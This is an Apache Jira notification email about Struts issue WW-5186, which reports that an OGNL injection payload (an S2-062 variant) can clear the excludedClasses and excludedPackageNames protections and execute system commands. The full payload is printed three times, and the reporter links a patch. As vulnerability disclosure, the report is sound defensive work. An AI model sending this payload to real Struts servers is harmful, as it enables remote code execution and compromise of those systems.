[jira] [Updated] (WW-5186) protect excludedClasses and excludedPackageNames

Sat, 11 Jun 2022 19:51:05 -0700 


     [ 
https://issues.apache.org/jira/browse/WW-5186?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

tanli updated WW-5186:
----------------------
    Description: 
protect excludedClasses and excludedPackageNames

1)use st062 exp below,attacker clean excludedPackageNames with

{{'excluded'+'PackageNames'}}

also worked.

 
{code:java}
%{
(#request.a=#@org.apache.commons.collections.BeanMap@{}) +
(#request.a.setBean(#request.get('struts.valueStack')) == true) +
(#request.b=#@org.apache.commons.collections.BeanMap@{}) +
(#request.b.setBean(#request.get('a').get('context'))) +
(#request.c=#@org.apache.commons.collections.BeanMap@{}) +
(#request.c.setBean(#request.get('b').get('memberAccess'))) +
(#request.get('c').put('excluded'+'PackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()))
 +
(#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()))
 +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc'}))
} {code}
 

2)to protect struts i push a patch with 

[struts pull|https://github.com/apache/struts/pull/567]

  was:
protect excludedClasses and excludedPackageNames

1)use st062 exp below,attacker clean {{{}excluded{}}}{{{}PackageNames {{}}}}use 

{{'excluded'+'PackageNames'}}

also worked.

```
 
{{%{
(#request.a=#@org.apache.commons.collections.BeanMap@{}) +
(#request.a.setBean(#request.get('struts.valueStack')) == true) +
(#request.b=#@org.apache.commons.collections.BeanMap@{}) +
(#request.b.setBean(#request.get('a').get('context'))) +
(#request.c=#@org.apache.commons.collections.BeanMap@{}) +
(#request.c.setBean(#request.get('b').get('memberAccess'))) +
(#request.get('c').put('excluded'+'PackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()))
 +
(#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()))
 +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec(\{'calc'}))
}}}

```

 

2)to protect struts i push a patch with 

[struts pull|https://github.com/apache/struts/pull/567]


> protect excludedClasses and excludedPackageNames
> ------------------------------------------------
>
>                 Key: WW-5186
>                 URL: https://issues.apache.org/jira/browse/WW-5186
>             Project: Struts 2
>          Issue Type: Improvement
>          Components: Core
>    Affects Versions: 2.5.30, 6.0.0
>            Reporter: tanli
>            Priority: Minor
>
> protect excludedClasses and excludedPackageNames
> 1)use st062 exp below,attacker clean excludedPackageNames with
> {{'excluded'+'PackageNames'}}
> also worked.
>  
> {code:java}
> %{
> (#request.a=#@org.apache.commons.collections.BeanMap@{}) +
> (#request.a.setBean(#request.get('struts.valueStack')) == true) +
> (#request.b=#@org.apache.commons.collections.BeanMap@{}) +
> (#request.b.setBean(#request.get('a').get('context'))) +
> (#request.c=#@org.apache.commons.collections.BeanMap@{}) +
> (#request.c.setBean(#request.get('b').get('memberAccess'))) +
> (#request.get('c').put('excluded'+'PackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()))
>  +
> (#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()))
>  +
> (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc'}))
> } {code}
>  
> 2)to protect struts i push a patch with 
> [struts pull|https://github.com/apache/struts/pull/567]



--
This message was sent by Atlassian Jira
(v8.20.7#820007)

Reply via email to